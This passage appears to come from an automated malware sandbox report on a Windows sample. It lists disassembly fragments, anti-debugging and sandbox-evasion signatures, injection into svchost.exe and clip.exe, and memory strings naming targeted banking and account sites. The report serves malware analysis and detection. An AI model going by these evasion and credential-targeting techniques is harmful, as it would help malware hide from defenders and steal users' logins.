Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004139CC push ebx; retf 2_2_004139CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042327B pushfd ; retf 2_2_00423286
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417AC3 push 00000045h; iretd 2_2_00417ACA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004032D0 push eax; ret 2_2_004032D2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00407307 push esp; ret 2_2_00407310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EC43 push edi; ret 2_2_0041EC4F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A450 push es; iretd 2_2_0041A463
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EC35 push edi; ret 2_2_0041EC4F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004084CC pushad ; iretd 2_2_004084CD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401CDD push ecx; retf 2_2_00401CDE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A4A7 push es; iretd 2_2_0041A463
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004186E8 push BC462628h; iretd 2_2_00418778
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418699 push ecx; ret 2_2_004186E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418699 push ds; retf 2_2_0041878A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418779 push ds; retf 2_2_0041878A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E7AC push ebx; iretd 2_2_0041E7AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300225F pushad ; ret 2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030027FA pushad ; ret 2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300283D push eax; iretd 2_2_03002858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300135E push eax; iretd 2_2_03001369
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D533E1 pushfd ; retf 6_2_02D533EC
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D4538E push esi; ret 6_2_02D45396
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D488DF push ds; retf 6_2_02D488F0
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D4884E push BC462628h; iretd 6_2_02D488DE
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00868111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00868111
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0081EB42
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0082123A
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\s7Okni1gfE.exe API/Special instruction interceptor: Address: 11B3D44
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\clip.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\clip.exe Window / User API: threadDelayed 9728
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Evaded block: after key decision graph_0-94136
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 4280 Thread sleep count: 246 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 4280 Thread sleep time: -492000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exe TID: 4280 Thread sleep count: 9728 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 4280 Thread sleep time: -19456000s >= -30000s
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe TID: 4940 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_00846CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00846CA9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_008460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_008460DD
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_008463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_008463F9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_0084EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0084EB60
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_0084F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0084F5FA
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_0084F56F FindFirstFileW,FindClose, 0_2_0084F56F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_00851B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00851B2F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_00851C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00851C8A
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_00851F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00851F94
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_0081DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0081DDC0
            Source: 5-19-2H.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 5-19-2H.7.dr Binary or memory string: discord.comVMware20,11696494690f
            Source: 5-19-2H.7.dr Binary or memory string: AMC password management pageVMware20,11696494690
            Source: 5-19-2H.7.dr Binary or memory string: outlook.office.comVMware20,11696494690s
            Source: 5-19-2H.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 5-19-2H.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 5-19-2H.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 5-19-2H.7.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 5-19-2H.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: 5-19-2H.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: 5-19-2H.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 5-19-2H.7.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
            Source: 5-19-2H.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: 5-19-2H.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 5-19-2H.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: 5-19-2H.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: 5-19-2H.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: WNGaDiurNI.exe, 00000008.00000002.2718154078.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2266940308.00000241F6CDC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 5-19-2H.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 5-19-2H.7.dr Binary or memory string: tasks.office.comVMware20,11696494690o
            Source: 5-19-2H.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: 5-19-2H.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
            Source: 5-19-2H.7.dr Binary or memory string: dev.azure.comVMware20,11696494690j
            Source: 5-19-2H.7.dr Binary or memory string: global block list test formVMware20,11696494690
            Source: 5-19-2H.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: 5-19-2H.7.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 5-19-2H.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 5-19-2H.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 5-19-2H.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: 5-19-2H.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 5-19-2H.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 5-19-2H.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004172D3 LdrLoadDll, 2_2_004172D3
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_00856AAF BlockInput, 0_2_00856AAF
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_00803D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00803D19
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_00833920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_00833920
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_0081E01E LoadLibraryA,GetProcAddress, 0_2_0081E01E
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_011B4010 mov eax, dword ptr fs:[00000030h] 0_2_011B4010
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_011B2990 mov eax, dword ptr fs:[00000030h] 0_2_011B2990
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe Code function: 0_2_011B3FB0 mov eax, dword ptr fs:[00000030h] 0_2_011B3FB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h] 2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h] 2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h] 2_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h] 2_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310634F mov eax, dword ptr fs:[00000030h] 2_2_0310634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h] 2_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h] 2_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h] 2_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h] 2_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h] 2_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h] 2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h] 2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310625D mov eax, dword ptr fs:[00000030h] 2_2_0310625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h] 2_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h] 2_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h] 2_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h] 2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h] 2_2_031062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h] 2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h] 2_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h] 2_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h] 2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h] 2_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h] 2_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h] 2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h] 2_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h] 2_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h] 2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h] 2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h] 2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h] 2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
